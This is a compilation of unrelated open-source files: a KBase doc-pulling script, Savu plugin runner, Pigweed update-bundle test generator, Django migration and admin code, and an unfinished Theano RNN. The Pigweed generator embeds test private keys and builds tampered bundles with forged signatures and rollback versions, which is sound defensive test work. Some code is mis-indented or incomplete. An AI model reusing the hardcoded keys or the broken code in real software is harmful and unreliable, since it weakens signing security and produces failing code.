#{'name': 'Experiment Service', #removed
#'service': 'experiment',
#'target_dir':'experiment',
#'html_name': 'experiment'},
{'name': 'FBA Modeling Service', #look at and fix
'service': 'fbaModelServices',
'target_dir':'KBaseFBAModeling',
'html_name': 'fbaModelServices'},
#{'name': 'Genotype Phenotype Service', #look at and fix
#'service': 'Genotype_PhenotypeAPI',
#'target_dir':'genotype_phenotype',
#'html_name': 'Genotype_PhenotypeAPI'},
{'name': 'PROM Service',
'service': 'prom_service',
'target_dir':'prom_service',
'html_name': 'PROM'},
{'name': 'Phispy Service',
'service': 'Phispy',
'target_dir':'phispy',
'html_name': 'Phispy'},
{'name': 'Regulation Service',
'service': 'Regulation',
'target_dir':'regulation',
'html_name': 'Regulation'},
{'name': 'Fizzy Feature Selection Service',
'service': 'feature_selection',
'target_dir':'feature_selection',
'html_name': 'Fizzy'},
]
def pull_api_doc(service, target, name, html_name=None, html_target=None):
if html_name:
url = DOCS_ROOT+service+'/'+html_name+'.html'
else:
url = DOCS_ROOT+service+'/'+service+'.html'
print "\nPulling API Doc file:", service, ' [', url, ']'
    try:
        r = urllib2.urlopen(url)
    except urllib2.HTTPError:
        # e.g. 404 when the doc page does not exist
        return
doc_text = r.read()
content = BeautifulSoup(doc_text)
#content.find(id='NAME').replace_with(name)
try:
nav = content.find('ul', id="index").extract()
except:
nav = None
target_dir = target+'/'+'API/'
if html_target:
content_target = target_dir+html_target+'.html'
else:
content_target = target_dir+service+'.html'
    with open(content_target, 'w') as f:
        f.write(str(content.prettify()))
    print 'Wrote content to:', content_target
if nav:
if html_target:
nav_target = target_dir+html_target+'_nav.html'
else:
nav_target = target_dir+service+'_nav.html'
        with open(nav_target, 'w') as f:
            f.write(str(nav.prettify()))
        print 'Wrote nav to:', nav_target
print
def pull_api_docs():
for obj in DEPLOY_DICT:
service = obj['service']
target = obj['target_dir']
name = obj['name']
        html_name = obj.get('html_name')
        html_target = obj.get('html_target')
if html_name and html_target:
pull_api_doc(service, target, name, html_name, html_target)
elif html_name:
pull_api_doc(service, target, name, html_name)
else:
pull_api_doc(service, target, name)
def pull_readmes():
pass
if __name__ == "__main__":
    pull_api_docs()
|
{
"content_hash": "1cde71bf2c3102723a9ea499865e2543",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 84,
"avg_line_length": 30.643835616438356,
"alnum_prop": 0.4714647593503204,
"repo_name": "kbase/docs",
"id": "5339b315b56f2611fb6af0729d1a3618b75b6abc",
"size": "6730",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pull-api-docs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "87338"
},
{
"name": "HTML",
"bytes": "33780935"
},
{
"name": "JavaScript",
"bytes": "147498"
},
{
"name": "Jupyter Notebook",
"bytes": "101314"
},
{
"name": "Makefile",
"bytes": "893"
},
{
"name": "PHP",
"bytes": "16652"
},
{
"name": "Perl",
"bytes": "18895"
},
{
"name": "Python",
"bytes": "24049"
},
{
"name": "Ruby",
"bytes": "53646"
},
{
"name": "Shell",
"bytes": "3673"
}
],
"symlink_target": ""
}
|
""" Methods for running a chain of plugins
.. module:: process
:platform: Unix
:synopsis: Methods for running a chain of plugins
.. moduleauthor:: Mark Basham <scientificsoftware@diamond.ac.uk>
"""
import os
import logging
import time
from mpi4py import MPI
import savu.plugins.utils as pu
from savu.core.utils import logfunction
def run_plugin_chain(input_data, plugin_list, processing_dir, mpi=False,
processes=["CPU0"], process=0):
"""Runs a chain of plugins
:param input_data: The input data to give to the chain
:type input_data: savu.data.structure.
:param plugin_list: Names of all the plugins to process in order.
:type plugin_list: list of str.
:param processing_dir: Location of the processing directory.
:type processing_dir: str.
:param mpi: Whether this is running in mpi, default is false.
:type mpi: bool.
"""
logging.debug("Starting run_plugin_chain")
in_data = input_data
output = None
count = 0
for plugin_name in plugin_list:
logging.debug("Loading plugin %s", plugin_name)
plugin = pu.load_plugin(plugin_name)
# generate somewhere for the data to go
file_name = os.path.join(processing_dir,
"%02i_%s.h5" % (count, plugin.name))
logging.debug("Creating output file : %s", file_name)
output = pu.create_output_data(plugin, in_data, file_name, plugin.name,
mpi)
plugin.set_parameters(None)
logging.debug("Starting processing plugin %s", plugin_name)
plugin.run_process(in_data, output, processes, process)
logging.debug("Completed processing plugin %s", plugin_name)
if in_data is not output:
in_data.complete()
in_data = output
if mpi:
logging.debug("MPI awaiting barrier")
MPI.COMM_WORLD.barrier()
count += 1
if output is not None:
output.complete()
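# Illustrative use of run_plugin_chain (a sketch; the plugin name and the
# processing directory below are placeholders, and `loaded_data` stands for
# data returned by a loader):
#
#   run_plugin_chain(loaded_data,
#                    ["savu.plugins.median_filter"],
#                    "/tmp/savu_processing")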
@logfunction
def run_process_list(input_data, process_list, processing_dir, mpi=False,
processes=["CPU0"], process=0):
"""Runs a chain of plugins
:param input_data: The input data to give to the chain
:type input_data: savu.data.structure.
:param process_list: Process list.
:type process_list: savu.data.structure.ProcessList.
:param processing_dir: Location of the processing directory.
:type processing_dir: str.
:param mpi: Whether this is running in mpi, default is false.
:type mpi: bool.
"""
logging.debug("Running process list, just a check")
filename = os.path.basename(input_data.backing_file.filename)
filename = os.path.splitext(filename)[0]
output_filename = \
os.path.join(processing_dir,
"%s_processed_%s.nxs" % (filename,
time.strftime("%Y%m%d%H%M%S")))
if process == 0:
logging.debug("Running Process List.save_list_to_file")
process_list.save_list_to_file(output_filename)
in_data = input_data
output = None
logging.debug("generating all output files")
files = []
count = 0
for process_dict in process_list.process_list:
logging.debug("Loading plugin %s", process_dict['id'])
plugin = pu.load_plugin(process_dict['id'])
# generate somewhere for the data to go
file_name = os.path.join(processing_dir,
"%s%02i_%s.h5" % (process_list.name, count,
process_dict['id']))
group_name = "%i-%s" % (count, plugin.name)
logging.debug("Creating output file %s", file_name)
output = pu.create_output_data(plugin, in_data, file_name, group_name,
mpi)
files.append(output)
in_data = output
count += 1
logging.debug("processing Plugins")
in_data = input_data
count = 0
for process_dict in process_list.process_list:
logging.debug("Loading plugin %s", process_dict['id'])
plugin = pu.load_plugin(process_dict['id'])
output = files[count]
plugin.set_parameters(process_dict['data'])
logging.debug("Starting processing plugin %s", process_dict['id'])
plugin.run_process(in_data, output, processes, process)
logging.debug("Completed processing plugin %s", process_dict['id'])
if in_data is not output:
in_data.complete()
in_data = output
if mpi:
logging.debug("Blocking till all processes complete")
MPI.COMM_WORLD.Barrier()
if process == 0:
cite_info = plugin.get_citation_inforamtion()
if cite_info is not None:
process_list.add_process_citation(output_filename, count,
cite_info)
group_name = "%i-%s" % (count, plugin.name)
process_list.add_intermediate_data_link(output_filename,
output, group_name)
count += 1
if output is not None:
output.complete()
|
{
"content_hash": "d776d2b78b06dd69bb7f485e8a2e8b93",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 79,
"avg_line_length": 33.79220779220779,
"alnum_prop": 0.5920445810914681,
"repo_name": "swtp1v07/Savu",
"id": "9ee5e34b44ddce8ec7963d90c67baf0adb0f8776",
"size": "5794",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "savu/core/process.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "84400"
},
{
"name": "C++",
"bytes": "509"
},
{
"name": "Makefile",
"bytes": "2126"
},
{
"name": "Python",
"bytes": "349231"
},
{
"name": "Shell",
"bytes": "6321"
}
],
"symlink_target": ""
}
|
"""Script for generating test bundles"""
import argparse
import subprocess
import sys
from typing import Dict, Optional
from pw_software_update import dev_sign, keys, metadata, root_metadata
from pw_software_update.update_bundle_pb2 import Manifest, UpdateBundle
from pw_software_update.tuf_pb2 import (RootMetadata, SignedRootMetadata,
TargetsMetadata, SignedTargetsMetadata)
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import serialization
HEADER = """// Copyright 2021 The Pigweed Authors
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not
// use this file except in compliance with the License. You may obtain a copy
// of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
// WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
// License for the specific language governing permissions and limitations under
// the License.
#pragma once
#include "pw_bytes/span.h"
"""
TEST_DEV_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgVgMQBOTJyx1xOafy
WTs2VkACf7Uo3RbP9Vun+oKXtMihRANCAATV7XJljxeUs2z2wqM5Q/kohAra1620
zXT90N9a3UR+IHksTd1OA7wFq220IQB/e4eVzbcOprN0MMMuSgXMxL8p
-----END PRIVATE KEY-----"""
TEST_PROD_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg73MLNmB/fPNX75Pl
YdynPtJkM2gGOWfIcHDuwuxSQmqhRANCAARpvjrXkjG2Fp+ZgREtxeTBBmJmWGS9
8Ny2tXY+Qggzl77G7wvCNF5+koz7ecsV6sKjK+dFiAXOIdqlga7p2j0A
-----END PRIVATE KEY-----"""
TEST_TARGETS_DEV_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQggRCrido5vZOnkULH
sxQDt9Qoe/TlEKoqa1bhO1HFbi6hRANCAASVwdXbGWM7+f/r+Z2W6Dbd7CQA0Cbb
pkBv5PnA+DZnCkFhLW2kTn89zQv8W1x4m9maoINp9QPXQ4/nXlrVHqDg
-----END PRIVATE KEY-----"""
TEST_TARGETS_PROD_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgx2VdB2EsUKghuLMG
RmxzqX2jnLTq5pxsFgO5Rrf5jlehRANCAASVijeDpemxVSlgZOOW0yvwE5QkXkq0
geWonkusMP0+MXopnmN0QlpgaCnG40TSr/W+wFjRmNCklL4dXk01oCwD
-----END PRIVATE KEY-----"""
TEST_ROOT_VERSION = 2
TEST_TARGETS_VERSION = 2
USER_MANIFEST_FILE_NAME = 'user_manifest'
TARGET_FILES = {
'file1': 'file 1 content'.encode(),
'file2': 'file 2 content'.encode(),
USER_MANIFEST_FILE_NAME: 'user manfiest content'.encode(),
}
def byte_array_declaration(data: bytes, name: str) -> str:
"""Generates a byte C array declaration for a byte array"""
type_name = '[[maybe_unused]] const std::byte'
byte_str = ''.join([f'std::byte{{0x{b:02x}}},' for b in data])
array_body = f'{{{byte_str}}}'
return f'{type_name} {name}[] = {array_body};'
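# For illustration, byte_array_declaration(b'\x01', 'kExample') returns:
#   '[[maybe_unused]] const std::byte kExample[] = {std::byte{0x01},};'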
def proto_array_declaration(proto, name: str) -> str:
"""Generates a byte array declaration for a proto"""
return byte_array_declaration(proto.SerializeToString(), name)
def private_key_public_pem_bytes(key: ec.EllipticCurvePrivateKey) -> bytes:
"""Serializes the public part of a private key in PEM format"""
return key.public_key().public_bytes(
serialization.Encoding.PEM,
serialization.PublicFormat.SubjectPublicKeyInfo)
def private_key_private_pem_bytes(key: ec.EllipticCurvePrivateKey) -> bytes:
"""Serializes the private part of a private key in PEM format"""
return key.private_bytes(encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption())
class Bundle:
"""A helper for test UpdateBundle generation"""
def __init__(self):
self._root_dev_key = serialization.load_pem_private_key(
TEST_DEV_KEY.encode(), None)
self._root_prod_key = serialization.load_pem_private_key(
TEST_PROD_KEY.encode(), None)
self._targets_dev_key = serialization.load_pem_private_key(
TEST_TARGETS_DEV_KEY.encode(), None)
self._targets_prod_key = serialization.load_pem_private_key(
TEST_TARGETS_PROD_KEY.encode(), None)
self._payloads: Dict[str, bytes] = {}
# Adds some update files.
for key, value in TARGET_FILES.items():
self.add_payload(key, value)
def add_payload(self, name: str, payload: bytes) -> None:
"""Adds a payload to the bundle"""
self._payloads[name] = payload
def generate_dev_root_metadata(self) -> RootMetadata:
"""Generates a root metadata with the dev key"""
# The dev root metadata contains both the prod and the dev public key,
# so that it can rotate to prod. But it will only use a dev targets
# key.
return root_metadata.gen_root_metadata(
root_metadata.RootKeys([
private_key_public_pem_bytes(self._root_dev_key),
private_key_public_pem_bytes(self._root_prod_key),
]),
root_metadata.TargetsKeys(
[private_key_public_pem_bytes(self._targets_dev_key)]),
TEST_ROOT_VERSION)
def generate_prod_root_metadata(self) -> RootMetadata:
"""Generates a root metadata with the prod key"""
        # The prod root metadata contains only the prod public key and uses the
        # prod targets key.
return root_metadata.gen_root_metadata(
root_metadata.RootKeys(
[private_key_public_pem_bytes(self._root_prod_key)]),
root_metadata.TargetsKeys(
[private_key_public_pem_bytes(self._targets_prod_key)]),
TEST_ROOT_VERSION)
def generate_dev_signed_root_metadata(self) -> SignedRootMetadata:
"""Generates a dev signed root metadata"""
signed_root = SignedRootMetadata()
root_metadata_proto = self.generate_dev_root_metadata()
signed_root.serialized_root_metadata = \
root_metadata_proto.SerializeToString()
return dev_sign.sign_root_metadata(
signed_root, private_key_private_pem_bytes(self._root_dev_key))
def generate_prod_signed_root_metadata(
self,
root_metadata_proto: Optional[RootMetadata] = None
) -> SignedRootMetadata:
"""Generates a root metadata signed by the prod key"""
if not root_metadata_proto:
root_metadata_proto = self.generate_prod_root_metadata()
signed_root = SignedRootMetadata(
serialized_root_metadata=root_metadata_proto.SerializeToString())
return dev_sign.sign_root_metadata(
signed_root, private_key_private_pem_bytes(self._root_prod_key))
def generate_targets_metadata(self) -> TargetsMetadata:
"""Generates the targets metadata"""
targets = metadata.gen_targets_metadata(self._payloads,
metadata.DEFAULT_HASHES,
TEST_TARGETS_VERSION)
return targets
def generate_unsigned_bundle(
self,
targets_metadata: Optional[TargetsMetadata] = None,
signed_root_metadata: Optional[SignedRootMetadata] = None
) -> UpdateBundle:
"""Generate an unsigned (targets metadata) update bundle"""
bundle = UpdateBundle()
if not targets_metadata:
targets_metadata = self.generate_targets_metadata()
if signed_root_metadata:
bundle.root_metadata.CopyFrom(signed_root_metadata)
bundle.targets_metadata['targets'].CopyFrom(
SignedTargetsMetadata(serialized_targets_metadata=targets_metadata.
SerializeToString()))
for name, payload in self._payloads.items():
bundle.target_payloads[name] = payload
return bundle
def generate_dev_signed_bundle(
self,
targets_metadata_override: Optional[TargetsMetadata] = None,
signed_root_metadata: Optional[SignedRootMetadata] = None
) -> UpdateBundle:
"""Generate a dev signed update bundle"""
return dev_sign.sign_update_bundle(
self.generate_unsigned_bundle(targets_metadata_override,
signed_root_metadata),
private_key_private_pem_bytes(self._targets_dev_key))
def generate_prod_signed_bundle(
self,
targets_metadata_override: Optional[TargetsMetadata] = None,
signed_root_metadata: Optional[SignedRootMetadata] = None
) -> UpdateBundle:
"""Generate a prod signed update bundle"""
# The targets metadata in a prod signed bundle can only be verified
# by a prod signed root. Because it is signed by the prod targets key.
# The prod signed root however, can be verified by a dev root.
return dev_sign.sign_update_bundle(
self.generate_unsigned_bundle(targets_metadata_override,
signed_root_metadata),
private_key_private_pem_bytes(self._targets_prod_key))
def generate_manifest(self) -> Manifest:
"""Generates the manifest"""
manifest = Manifest()
manifest.targets_metadata['targets'].CopyFrom(
self.generate_targets_metadata())
if USER_MANIFEST_FILE_NAME in self._payloads:
manifest.user_manifest = self._payloads[USER_MANIFEST_FILE_NAME]
return manifest
def parse_args():
"""Setup argparse."""
parser = argparse.ArgumentParser()
parser.add_argument("output_header",
help="output path of the generated C header")
return parser.parse_args()
def main() -> int:
"""Main"""
# TODO(b/237580538): Refactor the code so that each test bundle generation
# is done in a separate function or script.
# pylint: disable=too-many-locals
args = parse_args()
test_bundle = Bundle()
dev_signed_root = test_bundle.generate_dev_signed_root_metadata()
dev_signed_bundle = test_bundle.generate_dev_signed_bundle()
dev_signed_bundle_with_root = test_bundle.generate_dev_signed_bundle(
signed_root_metadata=dev_signed_root)
unsigned_bundle_with_root = test_bundle.generate_unsigned_bundle(
signed_root_metadata=dev_signed_root)
manifest_proto = test_bundle.generate_manifest()
prod_signed_root = \
test_bundle.generate_prod_signed_root_metadata()
prod_signed_bundle = test_bundle.generate_prod_signed_bundle(
None, prod_signed_root)
dev_signed_bundle_with_prod_root = test_bundle.generate_dev_signed_bundle(
signed_root_metadata=prod_signed_root)
# Generates a prod root metadata that fails signature verification against
# the dev root (i.e. it has a bad prod signature). This is done by making
# a bad prod signature.
bad_prod_signature = test_bundle.generate_prod_root_metadata()
signed_bad_prod_signature = \
test_bundle\
.generate_prod_signed_root_metadata(
bad_prod_signature)
# Compromises the signature.
signed_bad_prod_signature.signatures[0].sig = b'1' * 64
signed_bad_prod_signature_bundle = test_bundle.generate_prod_signed_bundle(
None, signed_bad_prod_signature)
    # Generates a prod root metadata that fails to verify itself. Specifically,
# the prod signature cannot be verified by the key in the incoming root
# metadata. This is done by dev signing a prod root metadata.
signed_mismatched_root_key_and_signature = SignedRootMetadata(
serialized_root_metadata=test_bundle.generate_prod_root_metadata(
).SerializeToString())
dev_root_key = serialization.load_pem_private_key(TEST_DEV_KEY.encode(),
None)
signature = keys.create_ecdsa_signature(
signed_mismatched_root_key_and_signature.serialized_root_metadata,
private_key_private_pem_bytes(dev_root_key)) # type: ignore
signed_mismatched_root_key_and_signature.signatures.append(signature)
mismatched_root_key_and_signature_bundle = test_bundle\
.generate_prod_signed_bundle(None,
signed_mismatched_root_key_and_signature)
# Generates a prod root metadata with rollback attempt.
root_rollback = test_bundle.generate_prod_root_metadata()
root_rollback.common_metadata.version = TEST_ROOT_VERSION - 1
signed_root_rollback = test_bundle.\
generate_prod_signed_root_metadata(root_rollback)
root_rollback_bundle = test_bundle.generate_prod_signed_bundle(
None, signed_root_rollback)
# Generates a bundle with a bad target signature.
    bad_targets_signature = test_bundle.generate_prod_signed_bundle(
None, prod_signed_root)
# Compromises the signature.
    bad_targets_signature.targets_metadata['targets'].signatures[
0].sig = b'1' * 64
# Generates a bundle with rollback attempt
targets_rollback = test_bundle.generate_targets_metadata()
targets_rollback.common_metadata.version = TEST_TARGETS_VERSION - 1
targets_rollback_bundle = test_bundle.generate_prod_signed_bundle(
targets_rollback, prod_signed_root)
# Generate bundles with mismatched hash
mismatched_hash_targets_bundles = []
# Generate bundles with mismatched file length
mismatched_length_targets_bundles = []
# Generate bundles with missing hash
missing_hash_targets_bundles = []
# Generate bundles with personalized out payload
personalized_out_bundles = []
# For each of the two files in `TARGET_FILES`, we generate a number of
# bundles each of which modify the target in the following way
# respectively:
# 1. Compromise its sha256 hash value in the targets metadata, so as to
# test hash verification logic.
# 2. Remove the hashes, to trigger verification failure cause by missing
# hashes.
# 3. Compromise the file length in the targets metadata.
# 4. Remove the payload to emulate being personalized out, so as to test
# that it does not cause verification failure.
for idx, payload_file in enumerate(TARGET_FILES.items()):
mismatched_hash_targets = test_bundle.generate_targets_metadata()
mismatched_hash_targets.target_files[idx].hashes[0].hash = b'0' * 32
mismatched_hash_targets_bundle = test_bundle\
.generate_prod_signed_bundle(
mismatched_hash_targets, prod_signed_root)
mismatched_hash_targets_bundles.append(mismatched_hash_targets_bundle)
mismatched_length_targets = test_bundle.generate_targets_metadata()
mismatched_length_targets.target_files[idx].length = 1
mismatched_length_targets_bundle = test_bundle\
.generate_prod_signed_bundle(
mismatched_length_targets, prod_signed_root)
mismatched_length_targets_bundles.append(
mismatched_length_targets_bundle)
missing_hash_targets = test_bundle.generate_targets_metadata()
missing_hash_targets.target_files[idx].hashes.pop()
missing_hash_targets_bundle = test_bundle.generate_prod_signed_bundle(
missing_hash_targets, prod_signed_root)
missing_hash_targets_bundles.append(missing_hash_targets_bundle)
file_name, _ = payload_file
personalized_out_bundle = test_bundle.generate_prod_signed_bundle(
None, prod_signed_root)
personalized_out_bundle.target_payloads.pop(file_name)
personalized_out_bundles.append(personalized_out_bundle)
with open(args.output_header, 'w') as header:
header.write(HEADER)
header.write(
proto_array_declaration(dev_signed_bundle, 'kTestDevBundle'))
header.write(
proto_array_declaration(dev_signed_bundle_with_root,
'kTestDevBundleWithRoot'))
header.write(
proto_array_declaration(unsigned_bundle_with_root,
'kTestUnsignedBundleWithRoot'))
header.write(
proto_array_declaration(dev_signed_bundle_with_prod_root,
'kTestDevBundleWithProdRoot'))
header.write(
proto_array_declaration(manifest_proto, 'kTestBundleManifest'))
header.write(proto_array_declaration(dev_signed_root,
'kDevSignedRoot'))
header.write(
proto_array_declaration(prod_signed_bundle, 'kTestProdBundle'))
header.write(
proto_array_declaration(mismatched_root_key_and_signature_bundle,
'kTestMismatchedRootKeyAndSignature'))
header.write(
proto_array_declaration(signed_bad_prod_signature_bundle,
'kTestBadProdSignature'))
header.write(
            proto_array_declaration(bad_targets_signature,
'kTestBadTargetsSignature'))
header.write(
proto_array_declaration(targets_rollback_bundle,
'kTestTargetsRollback'))
header.write(
proto_array_declaration(root_rollback_bundle, 'kTestRootRollback'))
for idx, mismatched_hash_bundle in enumerate(
mismatched_hash_targets_bundles):
header.write(
proto_array_declaration(
mismatched_hash_bundle,
f'kTestBundleMismatchedTargetHashFile{idx}'))
for idx, missing_hash_bundle in enumerate(
missing_hash_targets_bundles):
header.write(
proto_array_declaration(
missing_hash_bundle,
f'kTestBundleMissingTargetHashFile{idx}'))
for idx, mismatched_length_bundle in enumerate(
mismatched_length_targets_bundles):
header.write(
proto_array_declaration(
mismatched_length_bundle,
f'kTestBundleMismatchedTargetLengthFile{idx}'))
for idx, personalized_out_bundle in enumerate(
personalized_out_bundles):
header.write(
proto_array_declaration(
personalized_out_bundle,
f'kTestBundlePersonalizedOutFile{idx}'))
subprocess.run([
'clang-format',
'-i',
args.output_header,
], check=True)
# TODO(b/237580538): Refactor the code so that each test bundle generation
# is done in a separate function or script.
# pylint: enable=too-many-locals
return 0
if __name__ == "__main__":
sys.exit(main())
|
{
"content_hash": "f6bd6cb8aca335687adabed92fcc262b",
"timestamp": "",
"source": "github",
"line_count": 432,
"max_line_length": 80,
"avg_line_length": 43.354166666666664,
"alnum_prop": 0.6556676811362059,
"repo_name": "google/pigweed",
"id": "1e5e0f7e93b2953421325adfa66c45244ed2c2aa",
"size": "19313",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pw_software_update/py/pw_software_update/generate_test_bundle.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8654"
},
{
"name": "C",
"bytes": "487991"
},
{
"name": "C++",
"bytes": "6119052"
},
{
"name": "CMake",
"bytes": "288698"
},
{
"name": "CSS",
"bytes": "4820"
},
{
"name": "Go",
"bytes": "18932"
},
{
"name": "HTML",
"bytes": "1194"
},
{
"name": "Java",
"bytes": "327548"
},
{
"name": "JavaScript",
"bytes": "12482"
},
{
"name": "Jinja",
"bytes": "2467"
},
{
"name": "Python",
"bytes": "3578966"
},
{
"name": "Rust",
"bytes": "645"
},
{
"name": "SCSS",
"bytes": "1382"
},
{
"name": "Shell",
"bytes": "22974"
},
{
"name": "Smarty",
"bytes": "692"
},
{
"name": "Starlark",
"bytes": "489444"
},
{
"name": "TypeScript",
"bytes": "235169"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
import shortuuidfield.fields
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', shortuuidfield.fields.ShortUUIDField(unique=True, max_length=22, editable=False, blank=True)),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=30)),
('role', models.CharField(max_length=20)),
('phone', models.CharField(max_length=20)),
('email', models.EmailField(max_length=75)),
('created_on', models.DateField(auto_now_add=True)),
('account', models.ForeignKey(to='accounts.Account')),
('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'contacts',
},
bases=(models.Model,),
),
]
|
{
"content_hash": "fe123ddc08970b6a379c925bdac2981d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 119,
"avg_line_length": 38.08571428571429,
"alnum_prop": 0.5753938484621155,
"repo_name": "tabdon/crmeasyapp",
"id": "112d2b4e454a5068cc7a29888b196a906e2b51de",
"size": "1357",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "crmapp/contacts/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7268"
},
{
"name": "JavaScript",
"bytes": "6240"
},
{
"name": "Python",
"bytes": "35582"
}
],
"symlink_target": ""
}
|
"""
This module is to define how TimeStamp model is represented in the Admin site
It also registers the model to be shown in the admin site
.. seealso:: :class:`..models.TimeStamp`
"""
from django.contrib import admin
from .models import TimeStamp
class FilterUserAdmin(admin.ModelAdmin):
"""
    Makes one user's timestamps invisible to other users, unless the viewer is a superuser
"""
def save_model(self, request, obj, form, change):
        if getattr(obj, 'user', None) is None:  # Assign the user only the first time
obj.user = request.user
obj.save()
def get_queryset(self, request):
qs = super(FilterUserAdmin, self).get_queryset(request)
#qs = admin.ModelAdmin.queryset(self, request)
if request.user.is_superuser:
return qs
return qs.filter(user=request.user)
def has_change_permission(self, request, obj=None):
if not obj:
# the changelist itself
return True # So they can see the change list page
return obj.user == request.user or request.user.is_superuser
class TimeStampAdmin(FilterUserAdmin):
"""
    This is the configuration of the TimeStamp model in the admin page.
    It inherits from FilterUserAdmin.
.. seealso:: :class:`FilterUserAdmin`
"""
list_display = ('time_stamp','user') # Fields to show in the listing
    list_filter = ['user'] # Enables viewing the timestamps of any single user
def has_add_permission(self, request):
"""
Disables addition of timeStamps from the admin page
"""
return False
def get_readonly_fields(self, request, obj=None):
"""
Disables editing in admin page
"""
if obj: # editing an existing object
return self.readonly_fields + ('time_stamp', 'user')
return self.readonly_fields
def has_delete_permission(self, request, obj=None):
"""
        Disables deletion of records in the admin page
"""
return False
admin.site.register(TimeStamp, TimeStampAdmin)  # Registers the TimeStamp model with the TimeStampAdmin settings in the admin site
|
{
"content_hash": "d4b118410817d9a05fb28f97c94a320a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 125,
"avg_line_length": 32.86363636363637,
"alnum_prop": 0.6454587367450438,
"repo_name": "zandegran/django-timeStamp",
"id": "a39d78970a2b5428929cac47bbcd677dcd4fd411",
"size": "2169",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "timeStamps/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14073"
}
],
"symlink_target": ""
}
|
import numpy as np
import theano
import theano.tensor as T
class OutputLayer:
def __init__(self, n_in, n_out, activation, name):
self.n_in=n_in
        self.n_out=n_out
        self.activation=activation
W_init= np.asarray(np.random.uniform(size=(n_in, n_out),
low=-.01, high=.01),
dtype=theano.config.floatX)
self.W_out = theano.shared(value=W_init, name='W_out_{}'.format(name))
by_init = np.zeros((n_out,), dtype=theano.config.floatX)
self.by = theano.shared(value=by_init, name='by_{}'.format(name))
self.params=[self.W_out,self.by]
def process_input(self, indata):
return self.activation(T.dot(indata, self.W_out) + self.by)
def get_params(self):
return self.params
class HiddenLayer:
def __init__(self, n_in, n_out, activation, name):
self.n_in=n_in
        self.n_out=n_out
        self.activation=activation
W_init= np.asarray(np.random.uniform(size=(n_in, n_out),
low=-.01, high=.01),
dtype=theano.config.floatX)
self.W_hid = theano.shared(value=W_init, name='W_hid_{}'.format(name))
b_init = np.zeros((n_out,), dtype=theano.config.floatX)
self.bh = theano.shared(value=b_init, name='bh_{}'.format(name))
W_init= np.asarray(np.random.uniform(size=(n_out, n_out),
low=-.01, high=.01),
dtype=theano.config.floatX)
self.W_rec = theano.shared(value=W_init, name='W_rec_{}'.format(name))
hrec_init = np.zeros((n_out,), dtype=theano.config.floatX)
self.hrec0 = theano.shared(value=hrec_init, name='hrec_{}'.format(name))
        #TODO: hrec0 is also a parameter to be learnt
self.params=[self.W_rec,self.W_hid,self.bh]
def process_input(self, indata, h_tm1):
h_t = self.activation(T.dot(indata, self.W_hid) + \
T.dot(h_tm1, self.W_rec) + self.bh)
return h_t
def get_params(self):
return self.params
def get_init_state(self):
        return self.hrec0
class RNNMultiOut:
def __init__(self, n_in, n_hid, n_out, n_groups):
self.n_in=n_in
self.n_hid=n_hid
self.n_out=n_out
self.h_l=HiddenLayer(n_in, n_hid, T.nnet.sigmoid, 'h1')
        self.o_ls=[ OutputLayer(n_hid, n_out, T.nnet.softmax, 'o{}'.format(i)) for i in xrange(n_groups) ]
x=T.matrix()
y=T.matrix()
g=T.vector()
#### function for processing a time step
        # recurrent step using the sigmoid hidden activation and softmax
        # output activations (matching the layers defined above)
def step(x_t, h_tm1):
h_t = self.h_l.process_input(x_t, h_tm1)
y_ts= [ self.o_ls[i].process_input(h_t) for i in xrange(n_groups) ]
            return h_t, y_ts[0], y_ts[1]
# the hidden state `h` for the entire sequence, and the output for the
# entire sequence `y` (first dimension is always time)
        [self.h, self.y0_pred, self.y1_pred], _ = theano.scan(
            step,
            sequences=x,
            outputs_info=[self.h_l.get_init_state(), None, None])
def load_data(data_fname):
pass
def main():
    # TODO: load the data, build the RNNMultiOut model and define the losses
    pass
if __name__ == '__main__':
main()
|
{
"content_hash": "820054476613e59b27787ebf0ae3a768",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 105,
"avg_line_length": 35.484848484848484,
"alnum_prop": 0.5138058639339596,
"repo_name": "anoopkunchukuttan/theano-rnn",
"id": "d5444401caf07126bc0693bdd8608d378ebacc41",
"size": "3513",
"binary": false,
